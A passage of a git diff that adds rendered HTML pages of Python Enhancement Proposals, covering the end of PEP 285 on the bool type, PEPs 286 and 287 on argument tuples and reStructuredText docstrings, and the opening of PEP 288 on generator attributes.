Because bool inherits from int, True+1 is valid and equals 2, and +so on. This is important for backwards compatibility: because +comparisons and so on currently return integer values, there’s no +way of telling what uses existing applications make of these +values.

+

It is expected that over time, the standard library will be +updated to use False and True when appropriate (but not to require +a bool argument type where previous an int was allowed). This +change should not pose additional problems and is not specified in +detail by this PEP.

+
+
+

C API

+

The header file “boolobject.h” defines the C API for the bool +type. It is included by “Python.h” so there is no need to include +it directly.

+

The existing names Py_False and Py_True reference the unique bool +objects False and True (previously these referenced static int +objects with values 0 and 1, which were not unique amongst int +values).

+

A new API, PyObject *PyBool_FromLong(long), takes a C long int +argument and returns a new reference to either Py_False (when the +argument is zero) or Py_True (when it is nonzero).

+

To check whether an object is a bool, the macro PyBool_Check() can +be used.

+

The type of bool instances is PyBoolObject *.

+

The bool type object is available as PyBool_Type.

+
+
+

Clarification

+

This PEP does not change the fact that almost all object types +can be used as truth values. For example, when used in an if +statement, an empty list is false and a non-empty one is true; +this does not change and there is no plan to ever change this.

+

The only thing that changes is the preferred values to represent +truth values when returned or assigned explicitly. Previously, +these preferred truth values were 0 and 1; the PEP changes the +preferred values to False and True, and changes built-in +operations to return these preferred values.

+
+
+

Compatibility

+

Because of backwards compatibility, the bool type lacks many +properties that some would like to see. For example, arithmetic +operations with one or two bool arguments is allowed, treating +False as 0 and True as 1. Also, a bool may be used as a sequence +index.

+

I don’t see this as a problem, and I don’t want evolve the +language in this direction either. I don’t believe that a +stricter interpretation of “Booleanness” makes the language any +clearer.

+

Another consequence of the compatibility requirement is that the +expression “True and 6” has the value 6, and similarly the +expression “False or None” has the value None. The “and” and “or” +operators are usefully defined to return the first argument that +determines the outcome, and this won’t change; in particular, they +don’t force the outcome to be a bool. Of course, if both +arguments are bools, the outcome is always a bool. It can also +easily be coerced into being a bool by writing for example “bool(x +and y)”.

+
+
+

Resolved Issues

+

(See also the Review section above.)

+
    +
  • Because the repr() or str() of a bool value is different from an +int value, some code (for example doctest-based unit tests, and +possibly database code that relies on things like “%s” % truth) +may fail. It is easy to work around this (without explicitly +referencing the bool type), and it is expected that this only +affects a very small amount of code that can easily be fixed.
  • +
  • Other languages (C99, C++, Java) name the constants “false” and +“true”, in all lowercase. For Python, I prefer to stick with +the example set by the existing built-in constants, which all +use CapitalizedWords: None, Ellipsis, NotImplemented (as well as +all built-in exceptions). Python’s built-in namespace uses all +lowercase for functions and types only.
  • +
  • It has been suggested that, in order to satisfy user +expectations, for every x that is considered true in a Boolean +context, the expression x == True should be true, and likewise +if x is considered false, x == False should be true. In +particular newbies who have only just learned about Boolean +variables are likely to write
    if x == True: ...
    +
    +
    +

    instead of the correct form,

    +
    if x: ...
    +
    +
    +

    There seem to be strong psychological and linguistic reasons why +many people are at first uncomfortable with the latter form, but +I believe that the solution should be in education rather than +in crippling the language. After all, == is general seen as a +transitive operator, meaning that from a==b and b==c we can +deduce a==c. But if any comparison to True were to report +equality when the other operand was a true value of any type, +atrocities like 6==True==7 would hold true, from which one could +infer the falsehood 6==7. That’s unacceptable. (In addition, +it would break backwards compatibility. But even if it didn’t, +I’d still be against this, for the stated reasons.)

    +

    Newbies should also be reminded that there’s never a reason to +write

    +
    if bool(x): ...
    +
    +
    +

    since the bool is implicit in the “if”. Explicit is not +better than implicit here, since the added verbiage impairs +readability and there’s no other interpretation possible. There +is, however, sometimes a reason to write

    +
    b = bool(x)
    +
    +
    +

    This is useful when it is unattractive to keep a reference to an +arbitrary object x, or when normalization is required for some +other reason. It is also sometimes appropriate to write

    +
    i = int(bool(x))
    +
    +
    +

    which converts the bool to an int with the value 0 or 1. This +conveys the intention to henceforth use the value as an int.

    +
  • +
+
+
+

Implementation

+

A complete implementation in C has been uploaded to the +SourceForge patch manager: https://bugs.python.org/issue528022

+

This will soon be checked into CVS for python 2.3a0.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0285.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0286/index.html b/pep-0286/index.html new file mode 100644 index 00000000000..20df0702086 --- /dev/null +++ b/pep-0286/index.html @@ -0,0 +1,238 @@ + + + + + + + + PEP 286 – Enhanced Argument Tuples | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 286 – Enhanced Argument Tuples

+
+
Author:
+
Martin von Löwis <martin at v.loewis.de>
+
Status:
+
Deferred
+
Type:
+
Standards Track
+
Created:
+
03-Mar-2002
+
Python-Version:
+
2.3
+
Post-History:
+

+
+
+
+
Table of Contents +
+
+

Abstract

+

PyArg_ParseTuple is confronted with difficult memory management if +an argument converter creates new memory. To deal with these +cases, a specialized argument type is proposed.

+
+
+

PEP Deferral

+

Further exploration of the concepts covered in this PEP has been deferred +for lack of a current champion interested in promoting the goals of the +PEP and collecting and incorporating feedback, and with sufficient +available time to do so effectively.

+

The resolution of this PEP may also be affected by the resolution of +PEP 426, which proposes the use of a preprocessing step to generate +some aspects of C API interface code.

+
+
+

Problem description

+

Today, argument tuples keep references to the function arguments, +which are guaranteed to live as long as the argument tuple exists +which is at least as long as the function call is being executed.

+

In some cases, parsing an argument will allocate new memory, which +is then to be released by the caller. This has two problems:

+
    +
  1. In case of failure, the application cannot know what memory to +release; most callers don’t even know that they have the +responsibility to release that memory. Example for this are +the N converter (bug #416288 [1]) and the es# converter (bug +#501716 [2]).
  2. +
  3. Even for successful argument parsing, it is still inconvenient +for the caller to be responsible for releasing the memory. In +some cases, this is unnecessarily inefficient. For example, +the es converter copies the conversion result into memory, even +though there already is a string object that has the right +contents.
  4. +
+
+
+

Proposed solution

+

A new type ‘argument tuple’ is introduced. This type derives from +tuple, adding an __dict__ member (at tp_dictoffset -4). Instances +of this type might get the following attributes:

+
    +
  • ‘failobjects’, a list of objects which need to be deallocated +in case of success
  • +
  • ‘okobjects’, a list of object which will be released when the +argument tuple is released
  • +
+

To manage this type, the following functions will be added, and +used appropriately in ceval.c and getargs.c:

+
    +
  • PyArgTuple_New(int);
  • +
  • PyArgTuple_AddFailObject(PyObject*, PyObject*);
  • +
  • PyArgTuple_AddFailMemory(PyObject*, void*);
  • +
  • PyArgTuple_AddOkObject(PyObject*, PyObject*);
  • +
  • PyArgTuple_AddOkMemory(PyObject*, void*);
  • +
  • PyArgTuple_ClearFailed(PyObject*);
  • +
+

When argument parsing fails, all fail objects will be released +through Py_DECREF, and all fail memory will be released through +PyMem_Free. If parsing succeeds, the references to the fail +objects and fail memory are dropped, without releasing anything.

+

When the argument tuple is released, all ok objects and memory +will be released.

+

If those functions are called with an object of a different type, +a warning is issued and no further action is taken; usage of the +affected converters without using argument tuples is deprecated.

+
+
+

Affected converters

+

The following converters will add fail memory and fail objects: N, +es, et, es#, et# (unless memory is passed into the converter)

+
+
+

New converters

+

To simplify Unicode conversion, the e* converters are duplicated +as E* converters (Es, Et, Es#, Et#). The usage of the E* +converters is identical to that of the e* converters, except that +the application will not need to manage the resulting memory. +This will be implemented through registration of Ok objects with +the argument tuple. The e* converters are deprecated.

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0286.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0287/index.html b/pep-0287/index.html new file mode 100644 index 00000000000..b449e0bb6e8 --- /dev/null +++ b/pep-0287/index.html @@ -0,0 +1,763 @@ + + + + + + + + PEP 287 – reStructuredText Docstring Format | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 287 – reStructuredText Docstring Format

+
+
Author:
+
David Goodger <goodger at python.org>
+
Discussions-To:
+
Doc-SIG list
+
Status:
+
Active
+
Type:
+
Informational
+
Created:
+
25-Mar-2002
+
Post-History:
+
02-Apr-2002
+
Replaces:
+
216
+
+
+
+
Table of Contents +
+
+

Abstract

+

When plaintext hasn’t been expressive enough for inline documentation, +Python programmers have sought out a format for docstrings. This PEP +proposes that the reStructuredText markup be adopted as a standard +markup format for structured plaintext documentation in Python +docstrings, and for PEPs and ancillary documents as well. +reStructuredText is a rich and extensible yet easy-to-read, +what-you-see-is-what-you-get plaintext markup syntax.

+

Only the low-level syntax of docstrings is addressed here. This PEP +is not concerned with docstring semantics or processing at all (see +PEP 256 for a “Road Map to the Docstring PEPs”). Nor is it an attempt +to deprecate pure plaintext docstrings, which are always going to be +legitimate. The reStructuredText markup is an alternative for those +who want more expressive docstrings.

+
+
+

Benefits

+

Programmers are by nature a lazy breed. We reuse code with functions, +classes, modules, and subsystems. Through its docstring syntax, +Python allows us to document our code from within. The “holy grail” +of the Python Documentation Special Interest Group (Doc-SIG) has been +a markup syntax and toolset to allow auto-documentation, where the +docstrings of Python systems can be extracted in context and processed +into useful, high-quality documentation for multiple purposes.

+

Document markup languages have three groups of customers: the authors +who write the documents, the software systems that process the data, +and the readers, who are the final consumers and the most important +group. Most markups are designed for the authors and software +systems; readers are only meant to see the processed form, either on +paper or via browser software. ReStructuredText is different: it is +intended to be easily readable in source form, without prior knowledge +of the markup. ReStructuredText is entirely readable in plaintext +format, and many of the markup forms match common usage (e.g., +*emphasis*), so it reads quite naturally. Yet it is rich enough +to produce complex documents, and extensible so that there are few +limits. Of course, to write reStructuredText documents some prior +knowledge is required.

+

The markup offers functionality and expressivity, while maintaining +easy readability in the source text. The processed form (HTML etc.) +makes it all accessible to readers: inline live hyperlinks; live links +to and from footnotes; automatic tables of contents (with live +links!); tables; images for diagrams etc.; pleasant, readable styled +text.

+

The reStructuredText parser is available now, part of the Docutils +project. Standalone reStructuredText documents and PEPs can be +converted to HTML; other output format writers are being worked on and +will become available over time. Work is progressing on a Python +source “Reader” which will implement auto-documentation from +docstrings. Authors of existing auto-documentation tools are +encouraged to integrate the reStructuredText parser into their +projects, or better yet, to join forces to produce a world-class +toolset for the Python standard library.

+

Tools will become available in the near future, which will allow +programmers to generate HTML for online help, XML for multiple +purposes, and eventually PDF, DocBook, and LaTeX for printed +documentation, essentially “for free” from the existing docstrings. +The adoption of a standard will, at the very least, benefit docstring +processing tools by preventing further “reinventing the wheel”.

+

Eventually PyDoc, the one existing standard auto-documentation tool, +could have reStructuredText support added. In the interim it will +have no problem with reStructuredText markup, since it treats all +docstrings as preformatted plaintext.

+
+
+

Goals

+

These are the generally accepted goals for a docstring format, as +discussed in the Doc-SIG:

+
    +
  1. It must be readable in source form by the casual observer.
  2. +
  3. It must be easy to type with any standard text editor.
  4. +
  5. It must not need to contain information which can be deduced from +parsing the module.
  6. +
  7. It must contain sufficient information (structure) so it can be +converted to any reasonable markup format.
  8. +
  9. It must be possible to write a module’s entire documentation in +docstrings, without feeling hampered by the markup language.
  10. +
+

reStructuredText meets and exceeds all of these goals, and sets its +own goals as well, even more stringent. See Docstring-Significant +Features below.

+

The goals of this PEP are as follows:

+
    +
  1. To establish reStructuredText as a standard structured plaintext +format for docstrings (inline documentation of Python modules and +packages), PEPs, README-type files and other standalone documents. +“Accepted” status will be sought through Python community consensus +and eventual BDFL pronouncement.

    Please note that reStructuredText is being proposed as a +standard, not the only standard. Its use will be entirely +optional. Those who don’t want to use it need not.

    +
  2. +
  3. To solicit and address any related concerns raised by the Python +community.
  4. +
  5. To encourage community support. As long as multiple competing +markups are out there, the development community remains fractured. +Once a standard exists, people will start to use it, and momentum +will inevitably gather.
  6. +
  7. To consolidate efforts from related auto-documentation projects. +It is hoped that interested developers will join forces and work on +a joint/merged/common implementation.
  8. +
+

Once reStructuredText is a Python standard, effort can be focused on +tools instead of arguing for a standard. Python needs a standard set +of documentation tools.

+

With regard to PEPs, one or both of the following strategies may be +applied:

+
    +
  1. Keep the existing PEP section structure constructs (one-line +section headers, indented body text). Subsections can either be +forbidden, or supported with reStructuredText-style underlined +headers in the indented body text.
  2. +
  3. Replace the PEP section structure constructs with the +reStructuredText syntax. Section headers will require underlines, +subsections will be supported out of the box, and body text need +not be indented (except for block quotes).
  4. +
+

Strategy (b) is recommended, and its implementation is complete.

+

Support for RFC 2822 headers has been added to the reStructuredText +parser for PEPs (unambiguous given a specific context: the first +contiguous block of the document). It may be desired to concretely +specify what over/underline styles are allowed for PEP section +headers, for uniformity.

+
+
+

Rationale

+

The lack of a standard syntax for docstrings has hampered the +development of standard tools for extracting and converting docstrings +into documentation in standard formats (e.g., HTML, DocBook, TeX). +There have been a number of proposed markup formats and variations, +and many tools tied to these proposals, but without a standard +docstring format they have failed to gain a strong following and/or +floundered half-finished.

+

Throughout the existence of the Doc-SIG, consensus on a single +standard docstring format has never been reached. A lightweight, +implicit markup has been sought, for the following reasons (among +others):

+
    +
  1. Docstrings written within Python code are available from within the +interactive interpreter, and can be “print”ed. Thus the use of +plaintext for easy readability.
  2. +
  3. Programmers want to add structure to their docstrings, without +sacrificing raw docstring readability. Unadorned plaintext cannot +be transformed (“up-translated”) into useful structured formats.
  4. +
  5. Explicit markup (like XML or TeX) is widely considered unreadable +by the uninitiated.
  6. +
  7. Implicit markup is aesthetically compatible with the clean and +minimalist Python syntax.
  8. +
+

Many alternative markups for docstrings have been proposed on the +Doc-SIG over the years; a representative sample is listed below. Each +is briefly analyzed in terms of the goals stated above. Please note +that this is not intended to be an exclusive list of all existing +markup systems; there are many other markups (Texinfo, Doxygen, TIM, +YODL, AFT, …) which are not mentioned.

+
    +
  • XML, SGML, DocBook, HTML, XHTML

    XML and SGML are explicit, well-formed meta-languages suitable for +all kinds of documentation. XML is a variant of SGML. They are +best used behind the scenes, because to untrained eyes they are +verbose, difficult to type, and too cluttered to read comfortably as +source. DocBook, HTML, and XHTML are all applications of SGML +and/or XML, and all share the same basic syntax and the same +shortcomings.

    +
  • +
  • TeX

    TeX is similar to XML/SGML in that it’s explicit, but not very easy +to write, and not easy for the uninitiated to read.

    +
  • +
  • Perl POD

    Most Perl modules are documented in a format called POD (Plain Old +Documentation). This is an easy-to-type, very low level format with +strong integration with the Perl parser. Many tools exist to turn +POD documentation into other formats: info, HTML and man pages, +among others. However, the POD syntax takes after Perl itself in +terms of readability.

    +
  • +
  • JavaDoc

    Special comments before Java classes and functions serve to document +the code. A program to extract these, and turn them into HTML +documentation is called javadoc, and is part of the standard Java +distribution. However, JavaDoc has a very intimate relationship +with HTML, using HTML tags for most markup. Thus it shares the +readability problems of HTML.

    +
  • +
  • Setext, StructuredText

    Early on, variants of Setext (Structure Enhanced Text), including +Zope Corp’s StructuredText, were proposed for Python docstring +formatting. Hereafter these variants will collectively be called +“STexts”. STexts have the advantage of being easy to read without +special knowledge, and relatively easy to write.

    +

    Although used by some (including in most existing Python +auto-documentation tools), until now STexts have failed to become +standard because:

    +
      +
    • STexts have been incomplete. Lacking “essential” constructs that +people want to use in their docstrings, STexts are rendered less +than ideal. Note that these “essential” constructs are not +universal; everyone has their own requirements.
    • +
    • STexts have been sometimes surprising. Bits of text are +unexpectedly interpreted as being marked up, leading to user +frustration.
    • +
    • SText implementations have been buggy.
    • +
    • Most STexts have no formal specification except for the +implementation itself. A buggy implementation meant a buggy spec, +and vice-versa.
    • +
    • There has been no mechanism to get around the SText markup rules +when a markup character is used in a non-markup context. In other +words, no way to escape markup.
    • +
    +
  • +
+

Proponents of implicit STexts have vigorously opposed proposals for +explicit markup (XML, HTML, TeX, POD, etc.), and the debates have +continued off and on since 1996 or earlier.

+

reStructuredText is a complete revision and reinterpretation of the +SText idea, addressing all of the problems listed above.

+
+
+

Specification

+

The specification and user documentation for reStructuredText is +quite extensive. Rather than repeating or summarizing it all +here, links to the originals are provided.

+

Please first take a look at A ReStructuredText Primer, a short and +gentle introduction. The Quick reStructuredText user reference +quickly summarizes all of the markup constructs. For complete and +extensive details, please refer to the following documents:

+ +

In addition, Problems With StructuredText explains many markup +decisions made with regards to StructuredText, and A Record of +reStructuredText Syntax Alternatives records markup decisions made +independently.

+
+
+

Docstring-Significant Features

+
    +
  • A markup escaping mechanism.

    Backslashes (\) are used to escape markup characters when needed +for non-markup purposes. However, the inline markup recognition +rules have been constructed in order to minimize the need for +backslash-escapes. For example, although asterisks are used for +emphasis, in non-markup contexts such as “*” or “(*)” or “x * y”, +the asterisks are not interpreted as markup and are left unchanged. +For many non-markup uses of backslashes (e.g., describing regular +expressions), inline literals or literal blocks are applicable; see +the next item.

    +
  • +
  • Markup to include Python source code and Python interactive +sessions: inline literals, literal blocks, and doctest blocks.

    Inline literals use double-backquotes to indicate program I/O or +code snippets. No markup interpretation (including backslash-escape +[\] interpretation) is done within inline literals.

    +

    Literal blocks (block-level literal text, such as code excerpts or +ASCII graphics) are indented, and indicated with a double-colon +(“::”) at the end of the preceding paragraph (right here –>):

    +
    if literal_block:
    +    text = 'is left as-is'
    +    spaces_and_linebreaks = 'are preserved'
    +    markup_processing = None
    +
    +
    +

    Doctest blocks begin with “>>> “ and end with a blank line. Neither +indentation nor literal block double-colons are required. For +example:

    +
    Here's a doctest block:
    +
    +>>> print 'Python-specific usage examples; begun with ">>>"'
    +Python-specific usage examples; begun with ">>>"
    +>>> print '(cut and pasted from interactive sessions)'
    +(cut and pasted from interactive sessions)
    +
    +
    +
  • +
  • Markup that isolates a Python identifier: interpreted text.

    Text enclosed in single backquotes is recognized as “interpreted +text”, whose interpretation is application-dependent. In the +context of a Python docstring, the default interpretation of +interpreted text is as Python identifiers. The text will be marked +up with a hyperlink connected to the documentation for the +identifier given. Lookup rules are the same as in Python itself: +LGB namespace lookups (local, global, builtin). The “role” of the +interpreted text (identifying a class, module, function, etc.) is +determined implicitly from the namespace lookup. For example:

    +
    class Keeper(Storer):
    +
    +    """
    +    Keep data fresher longer.
    +
    +    Extend `Storer`.  Class attribute `instances` keeps track
    +    of the number of `Keeper` objects instantiated.
    +    """
    +
    +    instances = 0
    +    """How many `Keeper` objects are there?"""
    +
    +    def __init__(self):
    +        """
    +        Extend `Storer.__init__()` to keep track of
    +        instances.  Keep count in `self.instances` and data
    +        in `self.data`.
    +        """
    +        Storer.__init__(self)
    +        self.instances += 1
    +
    +        self.data = []
    +        """Store data in a list, most recent last."""
    +
    +    def storedata(self, data):
    +        """
    +        Extend `Storer.storedata()`; append new `data` to a
    +        list (in `self.data`).
    +        """
    +        self.data = data
    +
    +
    +

    Each piece of interpreted text is looked up according to the local +namespace of the block containing its docstring.

    +
  • +
  • Markup that isolates a Python identifier and specifies its type: +interpreted text with roles.

    Although the Python source context reader is designed not to require +explicit roles, they may be used. To classify identifiers +explicitly, the role is given along with the identifier in either +prefix or suffix form:

    +
    Use :method:`Keeper.storedata` to store the object's data in
    +`Keeper.data`:instance_attribute:.
    +
    +
    +

    The syntax chosen for roles is verbose, but necessarily so (if +anyone has a better alternative, please post it to the Doc-SIG). +The intention of the markup is that there should be little need to +use explicit roles; their use is to be kept to an absolute minimum.

    +
  • +
  • Markup for “tagged lists” or “label lists”: field lists.

    Field lists represent a mapping from field name to field body. +These are mostly used for extension syntax, such as “bibliographic +field lists” (representing document metadata such as author, date, +and version) and extension attributes for directives (see below). +They may be used to implement methodologies (docstring semantics), +such as identifying parameters, exceptions raised, etc.; such usage +is beyond the scope of this PEP.

    +

    A modified RFC 2822 syntax is used, with a colon before as well as +after the field name. Field bodies are more versatile as well; +they may contain multiple field bodies (even nested field lists). +For example:

    +
    :Date: 2002-03-22
    +:Version: 1
    +:Authors:
    +    - Me
    +    - Myself
    +    - I
    +
    +
    +

    Standard RFC 2822 header syntax cannot be used for this construct +because it is ambiguous. A word followed by a colon at the +beginning of a line is common in written text.

    +
  • +
  • Markup extensibility: directives and substitutions.

    Directives are used as an extension mechanism for reStructuredText, +a way of adding support for new block-level constructs without +adding new syntax. Directives for images, admonitions (note, +caution, etc.), and tables of contents generation (among others) +have been implemented. For example, here’s how to place an image:

    +
    .. image:: mylogo.png
    +
    +
    +

    Substitution definitions allow the power and flexibility of +block-level directives to be shared by inline text. For example:

    +
    The |biohazard| symbol must be used on containers used to
    +dispose of medical waste.
    +
    +.. |biohazard| image:: biohazard.png
    +
    +
    +
  • +
  • Section structure markup.

    Section headers in reStructuredText use adornment via underlines +(and possibly overlines) rather than indentation. For example:

    +
    This is a Section Title
    +=======================
    +
    +This is a Subsection Title
    +--------------------------
    +
    +This paragraph is in the subsection.
    +
    +This is Another Section Title
    +=============================
    +
    +This paragraph is in the second section.
    +
    +
    +
  • +
+
+
+

Questions & Answers

+
    +
  1. Is reStructuredText rich enough?

    Yes, it is for most people. If it lacks some construct that is +required for a specific application, it can be added via the +directive mechanism. If a useful and common construct has been +overlooked and a suitably readable syntax can be found, it can be +added to the specification and parser.

    +
  2. +
  3. Is reStructuredText too rich?

    For specific applications or individuals, perhaps. In general, no.

    +

    Since the very beginning, whenever a docstring markup syntax has +been proposed on the Doc-SIG, someone has complained about the +lack of support for some construct or other. The reply was often +something like, “These are docstrings we’re talking about, and +docstrings shouldn’t have complex markup.” The problem is that a +construct that seems superfluous to one person may be absolutely +essential to another.

    +

    reStructuredText takes the opposite approach: it provides a rich +set of implicit markup constructs (plus a generic extension +mechanism for explicit markup), allowing for all kinds of +documents. If the set of constructs is too rich for a particular +application, the unused constructs can either be removed from the +parser (via application-specific overrides) or simply omitted by +convention.

    +
  4. +
  5. Why not use indentation for section structure, like StructuredText +does? Isn’t it more “Pythonic”?

    Guido van Rossum wrote the following in a 2001-06-13 Doc-SIG post:

    +
    +
    I still think that using indentation to indicate sectioning is +wrong. If you look at how real books and other print +publications are laid out, you’ll notice that indentation is +used frequently, but mostly at the intra-section level. +Indentation can be used to offset lists, tables, quotations, +examples, and the like. (The argument that docstrings are +different because they are input for a text formatter is wrong: +the whole point is that they are also readable without +processing.)

    I reject the argument that using indentation is Pythonic: text +is not code, and different traditions and conventions hold. +People have been presenting text for readability for over 30 +centuries. Let’s not innovate needlessly.

    +
    +

    See Section Structure via Indentation in Problems With +StructuredText for further elaboration.

    +
  6. +
  7. Why use reStructuredText for PEPs? What’s wrong with the existing +standard?

    The existing standard for PEPs is very limited in terms of general +expressibility, and referencing is especially lacking for such a +reference-rich document type. PEPs are currently converted into +HTML, but the results (mostly monospaced text) are less than +attractive, and most of the value-added potential of HTML +(especially inline hyperlinks) is untapped.

    +

    Making reStructuredText a standard markup for PEPs will enable much +richer expression, including support for section structure, inline +markup, graphics, and tables. In several PEPs there are ASCII +graphics diagrams, which are all that plaintext documents can +support. Since PEPs are made available in HTML form, the ability +to include proper diagrams would be immediately useful.

    +

    Current PEP practices allow for reference markers in the form “[1]” +in the text, and the footnotes/references themselves are listed in +a section toward the end of the document. There is currently no +hyperlinking between the reference marker and the +footnote/reference itself (it would be possible to add this to +pep2html.py, but the “markup” as it stands is ambiguous and +mistakes would be inevitable). A PEP with many references (such as +this one ;-) requires a lot of flipping back and forth. When +revising a PEP, often new references are added or unused references +deleted. It is painful to renumber the references, since it has to +be done in two places and can have a cascading effect (insert a +single new reference 1, and every other reference has to be +renumbered; always adding new references to the end is suboptimal). +It is easy for references to go out of sync.

    +

    PEPs use references for two purposes: simple URL references and +footnotes. reStructuredText differentiates between the two. A PEP +might contain references like this:

    +
    Abstract
    +
    +    This PEP proposes adding frungible doodads [1] to the core.
    +    It extends PEP 9876 [2] via the BCA [3] mechanism.
    +
    +...
    +
    +References and Footnotes
    +
    +    [1] http://www.example.org/
    +
    +    [2] PEP 9876, Let's Hope We Never Get Here
    +        http://peps.python.org/pep-9876/
    +
    +    [3] "Bogus Complexity Addition"
    +
    +
    +

    Reference 1 is a simple URL reference. Reference 2 is a footnote +containing text and a URL. Reference 3 is a footnote containing +text only. Rewritten using reStructuredText, this PEP could look +like this:

    +
    Abstract
    +========
    +
    +This PEP proposes adding `frungible doodads`_ to the core.  It
    +extends PEP 9876 [#pep9876]_ via the BCA [#]_ mechanism.
    +
    +...
    +
    +References & Footnotes
    +======================
    +
    +.. _frungible doodads: http://www.example.org/
    +
    +.. [#pep9876] PEP 9876, Let's Hope We Never Get Here
    +
    +.. [#] "Bogus Complexity Addition"
    +
    +
    +

    URLs and footnotes can be defined close to their references if +desired, making them easier to read in the source text, and making +the PEPs easier to revise. The “References and Footnotes” section +can be auto-generated with a document tree transform. Footnotes +from throughout the PEP would be gathered and displayed under a +standard header. If URL references should likewise be written out +explicitly (in citation form), another tree transform could be +used.

    +

    URL references can be named (“frungible doodads”), and can be +referenced from multiple places in the document without additional +definitions. When converted to HTML, references will be replaced +with inline hyperlinks (HTML <a> tags). The two footnotes are +automatically numbered, so they will always stay in sync. The +first footnote also contains an internal reference name, “pep9876”, +so it’s easier to see the connection between reference and footnote +in the source text. Named footnotes can be referenced multiple +times, maintaining consistent numbering.

    +

    The “#pep9876” footnote could also be written in the form of a +citation:

    +
    It extends PEP 9876 [PEP9876]_ ...
    +
    +.. [PEP9876] PEP 9876, Let's Hope We Never Get Here
    +
    +
    +

    Footnotes are numbered, whereas citations use text for their +references.

    +
  8. +
  9. Wouldn’t it be better to keep the docstring and PEP proposals +separate?

    The PEP markup proposal may be removed if it is deemed that there +is no need for PEP markup, or it could be made into a separate PEP. +If accepted, PEP 1, PEP Purpose and Guidelines, and PEP 9, +Sample PEP Template will be updated.

    +

    It seems natural to adopt a single consistent markup standard for +all uses of structured plaintext in Python, and to propose it all +in one place.

    +
  10. +
  11. The existing pep2html.py script converts the existing PEP format to +HTML. How will the new-format PEPs be converted to HTML?

    A new version of pep2html.py with integrated reStructuredText +parsing has been completed. The Docutils project supports PEPs +with a “PEP Reader” component, including all functionality +currently in pep2html.py (auto-recognition of PEP & RFC references, +email masking, etc.).

    +
  12. +
  13. Who’s going to convert the existing PEPs to reStructuredText?

    PEP authors or volunteers may convert existing PEPs if they like, +but there is no requirement to do so. The reStructuredText-based +PEPs will coexist with the old PEP standard. The pep2html.py +mentioned in answer 6 processes both old and new standards.

    +
  14. +
  15. Why use reStructuredText for README and other ancillary files?

    The reasoning given for PEPs in answer 4 above also applies to +README and other ancillary files. By adopting a standard markup, +these files can be converted to attractive cross-referenced HTML +and put up on python.org. Developers of other projects can also +take advantage of this facility for their own documentation.

    +
  16. +
  17. Won’t the superficial similarity to existing markup conventions +cause problems, and result in people writing invalid markup (and +not noticing, because the plaintext looks natural)? How forgiving +is reStructuredText of “not quite right” markup?

    There will be some mis-steps, as there would be when moving from +one programming language to another. As with any language, +proficiency grows with experience. Luckily, reStructuredText is a +very little language indeed.

    +

    As with any syntax, there is the possibility of syntax errors. It +is expected that a user will run the processing system over their +input and check the output for correctness.

    +

    In a strict sense, the reStructuredText parser is very unforgiving +(as it should be; “In the face of ambiguity, refuse the temptation +to guess” applies to parsing markup as well as computer +languages). Here’s design goal 3 from An Introduction to +reStructuredText:

    +
    +
    Unambiguous. The rules for markup must not be open for +interpretation. For any given input, there should be one and +only one possible output (including error output).
    +

    While unforgiving, at the same time the parser does try to be +helpful by producing useful diagnostic output (“system messages”). +The parser reports problems, indicating their level of severity +(from least to most: debug, info, warning, error, severe). The +user or the client software can decide on reporting thresholds; +they can ignore low-level problems or cause high-level problems to +bring processing to an immediate halt. Problems are reported +during the parse as well as included in the output, often with +two-way links between the source of the problem and the system +message explaining it.

    +
  18. +
  19. Will the docstrings in the Python standard library modules be +converted to reStructuredText?

    No. Python’s library reference documentation is maintained +separately from the source. Docstrings in the Python standard +library should not try to duplicate the library reference +documentation. The current policy for docstrings in the Python +standard library is that they should be no more than concise +hints, simple and markup-free (although many do contain ad-hoc +implicit markup).

    +
  20. +
  21. I want to write all my strings in Unicode. Will anything +break?

    The parser fully supports Unicode. Docutils supports arbitrary +input and output encodings.

    +
  22. +
  23. Why does the community need a new structured text design?

    The existing structured text designs are deficient, for the +reasons given in “Rationale” above. reStructuredText aims to be a +complete markup syntax, within the limitations of the “readable +plaintext” medium.

    +
  24. +
  25. What is wrong with existing documentation methodologies?

    What existing methodologies? For Python docstrings, there is +no official standard markup format, let alone a documentation +methodology akin to JavaDoc. The question of methodology is at a +much higher level than syntax (which this PEP addresses). It is +potentially much more controversial and difficult to resolve, and +is intentionally left out of this discussion.

    +
  26. +
+
+ +
+

Acknowledgements

+

Some text is borrowed from PEP 216, Docstring Format, by +Moshe Zadka.

+

Special thanks to all members past & present of the Python Doc-SIG.

+
+
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0287.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0288/index.html b/pep-0288/index.html new file mode 100644 index 00000000000..f3927937e64 --- /dev/null +++ b/pep-0288/index.html @@ -0,0 +1,261 @@ + + + + + + + + PEP 288 – Generators Attributes and Exceptions | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 288 – Generators Attributes and Exceptions

+
+
Author:
+
Raymond Hettinger <python at rcn.com>
+
Status:
+
Withdrawn
+
Type:
+
Standards Track
+
Created:
+
21-Mar-2002
+
Python-Version:
+
2.5
+
Post-History:
+

+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposes to enhance generators by providing mechanisms for +raising exceptions and sharing data with running generators.

+
+
+

Status

+

This PEP is withdrawn. The exception raising mechanism was extended +and subsumed into PEP 343. The attribute passing capability +never built a following, did not have a clear implementation, +and did not have a clean way for the running generator to access +its own namespace.

+
+
+

Rationale

+

Currently, only class based iterators can provide attributes and +exception handling. However, class based iterators are harder to +write, less compact, less readable, and slower. A better solution +is to enable these capabilities for generators.

+

